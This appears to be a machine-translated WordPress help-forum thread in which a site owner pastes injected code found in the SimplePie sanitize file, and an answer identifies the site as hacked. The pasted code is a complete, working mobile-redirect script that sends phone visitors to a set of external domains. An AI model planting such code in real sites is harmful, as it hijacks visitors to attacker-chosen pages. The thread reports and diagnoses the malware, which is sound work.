有人知道Simplepie在我的WordPress网站上做什么吗?

时间:2015-05-12 作者:renato

在我的网站上使用下一个wordpress版本:4.2.2插件:

Complementos instalados: LayerSlider WP por Kreatura Media versión 5.2.0
                     CodeStyling Localization por Heiko Rabe versión 1.99.30
                     Desactivar Comentarios por Samir Shah versión 1.3.1
                     Google Analytics por Yoast por Equipo Yoast versión 5.4.2
                     Anti-Malware and Brute-Force Security by ELI por Eli Scheetz versión 4.15.20
                     KIA Subtitle por Kathy Darling versión 1.6.3
                     Plugins Language Switcher por Vladimir Garagulya versión 1.4.4
                     Sucuri Security - Auditing
                     Malware Scanner and Hardening por Sucuri
                     INC versión 1.7.9
                     WooCommerce por WooThemes versión 2.1.8
                     WP Super Cache por Automattic versión 1.4.4
接下来的路线是:wp包括/简单化/消毒。php

几天前(2015年5月10日),一些代码不知从何处插入到上述领域。

代码是下一个:

        $ret .= \'</head><body><script>var myArray = [\'http://vikburgas.info/adb/\',\'http://vikburgas.com/adb/\',\'http://solodev.eu/adb/\',\'http://vikvarna.net/adb/\',\'http://vikplovdiv.com/adb/\'];var ri = Math.floor(Math.random() * myArray.length);var url = myArray[ri];(function(a,b){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera, url);</script>\' . $html . \'</body></html>\';

1 个回复
SO网友:Rarst

SimplePie库随WordPress core一起提供(已经有很长一段时间了)。它用于解析RSS提要。

你的问题与此无关,很明显这是一个被入侵的网站和插入恶意代码的案例。

请注意,考虑从黑客中恢复not in scope 在这里。这不是可以“回答”的事情,你需要有能力的专业人员来妥善清理。

结束
标签: simplepie   小码农  

相关推荐

如何为内置的SimplePie提要解析器设置缓存?

我正在使用内置的SimplePie,又名fetch_feed(), 要检索提要,我希望能够从管理菜单中调整缓存时间。SimplePie 它本身有很好的文档记录,但它的WordPress实现并不多。关于设置缓存持续时间的最佳方法,您有什么想法吗?